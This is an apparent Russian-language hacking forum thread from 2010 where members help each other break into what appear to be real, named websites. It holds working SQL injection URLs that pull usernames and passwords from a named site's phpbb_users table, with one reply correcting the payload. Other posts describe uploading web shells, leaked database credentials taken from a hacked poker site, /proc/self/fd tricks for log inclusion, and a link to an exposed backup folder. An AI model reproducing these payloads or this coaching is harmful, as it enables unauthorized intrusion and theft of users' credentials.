Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. MuTANta

    MuTANta New Member

    Joined:
    6 Apr 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Скажите от чего зависит цифра в имени ссылки на лог апача?
    /proc/self/fd/2
    /proc/self/fd/11

    мне нужно чтоб при инклуде сразу добраться до логов.
     
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    http://www.yellowbulletin.com/backup/
    смотрите, может есть че нить ценное!
     
    #12202 Strilo4ka, 6 Apr 2010
    Last edited: 6 Apr 2010
  3. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    Это ярлыки.
    Логам апача вроде соответствуют 2 или 7.
     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Как насчет идеи провести пен-тест обхода mysql_escape_string и htmlspecialchar с использованием многобайтных кодировок. Развеевание в паблике мифа в реальность! Если да, то многие двиги можна скомпроментировать (искажение данный или експлуатация разных уязвимостей!). Смотрю здесь сегодня собрание)
     
  5. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91

    Тесть:
    (эта функция уже не рекомендуется к использованию, а функция mysql_real_escape_string проверяет кодировку текущего соединения, так что у неё меньше проблем с подобным уязвимостями.)
    Code:
    /* {{{ proto string mysql_escape_string(string to_be_escaped)
       Escape string for mysql query */
    PHP_FUNCTION(mysql_escape_string)
    {
    	char *str;
    	int str_len;
    
    	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
    		return;
    	}
    
    	/* assume worst case situation, which is 2x of the original string.
    	 * we don't realloc() down to the real size since it'd most probably not
    	 * be worth it
    	 */
    
    	Z_STRVAL_P(return_value) = (char *) safe_emalloc(str_len, 2, 1);
    	Z_STRLEN_P(return_value) = mysql_escape_string(Z_STRVAL_P(return_value), str, str_len);
    	Z_TYPE_P(return_value) = IS_STRING;
    
    	if (MySG(trace_mode)){
    		php_error_docref("function.mysql-real-escape-string" TSRMLS_CC, E_DEPRECATED, "This function is deprecated; use mysql_real_escape_string() instead.");
    	}
    }
    /* }}} */
     
    #12205 Root-access, 7 Apr 2010
    Last edited: 7 Apr 2010
    1 person likes this.
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196



    Не всегда есть доступ к логам таким образом же.
     
  7. MuTANta

    MuTANta New Member

    Joined:
    6 Apr 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196
    последовательно, цифра за цифрой.
     
  9. MuTANta

    MuTANta New Member

    Joined:
    6 Apr 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    отчего зависит цифра?
    на какой лог ссылается ссыока?
     
  10. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Народ.. тут Слепая MySQL injection 5'тая Версия...
    и не идет.. помогите плиз!
     
    _________________________
  11. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    так щас пишет что Сайт временно отключен
    наверное попалили
     
  12. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    нет так он и есть.. там 100% есть уязвимость
     
    _________________________
  13. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Залил на один ресурс шелл от madneta
    прочитал файл msql-конфиг внём такая инфа

    objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=sas;"
    objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=ichsss;"

    Мне нужно слить базу логинов и пассов. Пытаюсь приконектиться к базе через шелл, localhost
    используя: логин: sa пасс:sas - не конектится, ошибка
    логин=sa;Password=ichsss - тоже самое

    попробывал зайти в каталог: С/msql_data_files/
    там лежат папки баз от других сайтов на этом хосте но папки POKER нет (
    В админку не залогиниться т.к. админ переименовал файл админки а в корневой папке ~500 файлов.
    Что посоветуете господа? Очень нужно слить базу, help somebody
    (новичок)
     
    #12213 Darren, 7 Apr 2010
    Last edited: 7 Apr 2010
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196
    попробуй http://sourceforge.net/projects/phpmsadmin/files/
     
  15. гостъ

    гостъ New Member

    Joined:
    4 Jan 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Вобщем так, для ясности и на глядности что и где:

    Можешь посмотреть сначала на /proc/self/status на значение pid, если ты не понял то self ето ссылка на етот пид, обращайся на /proc/цыфра_которой_соответствует_pid/2, а там уже
    Code:
    ls -la /proc/цыфра_которой_соответствует_pid/fd/
    итого 0
    dr-x------ 2 apache apache  0 2010-04-07 14:04 ./
    dr-xr-xr-x 7 apache apache  0 2010-04-07 13:56 ../
    lr-x------ 1 apache apache 64 2010-04-07 14:04 0 -> /dev/null
    l-wx------ 1 apache apache 64 2010-04-07 14:04 1 -> /dev/null
    l-wx------ 1 apache apache 64 2010-04-07 14:04 2 -> /var/log/httpd/error_log
    
    ссылка на логи, а проинклудишь или нет, зависит от прав.:(

    UPD
    Кстате ты интересовался именно цыфрой, она от одмина не зависит, зависит только от количества логов который использует апач. Если хостинг апач с под пользоваетлся, на огромном хостинге то попадешь на 2, если с под апача туева куча то будешь искать, как подсказывает опыт.
     
    #12215 гостъ, 7 Apr 2010
    Last edited: 7 Apr 2010
  16. Slay90

    Slay90 Member

    Joined:
    12 Apr 2009
    Messages:
    146
    Likes Received:
    16
    Reputations:
    -5
    подобрал на сайте баблицу с логинами и пассами
    Code:
    http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x70687062625f7573657273--
    назнаю как извлечь user_id,username,user_password

    Code:
    http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+information_schema.tables--
    вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!!
     
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Тебе надо user_id, username и user_password тащить не из information_schema.tables, а из таблицы, которую ты указал в первом запросе
     
    #12217 h00lyshit!, 7 Apr 2010
    Last edited: 7 Apr 2010
  18. Slay90

    Slay90 Member

    Joined:
    12 Apr 2009
    Messages:
    146
    Likes Received:
    16
    Reputations:
    -5
    http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+0x70687062625f7573657273--

    Делаю не получается =\ подскажите как правильно смотреть содержимое столбцов таблиц
     
  19. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    _http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3a,username,user_password)+from+phpbb_users+limit+86,1--+
     
  20. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    я через админку залил шелл, прохожу по ссылке и вижу "500. Внутренняя ошибка". Либо с правами на директорию что-то, либо с htaccess. Что посоветуете ?
     
Loading...
Thread Status:
Not open for further replies.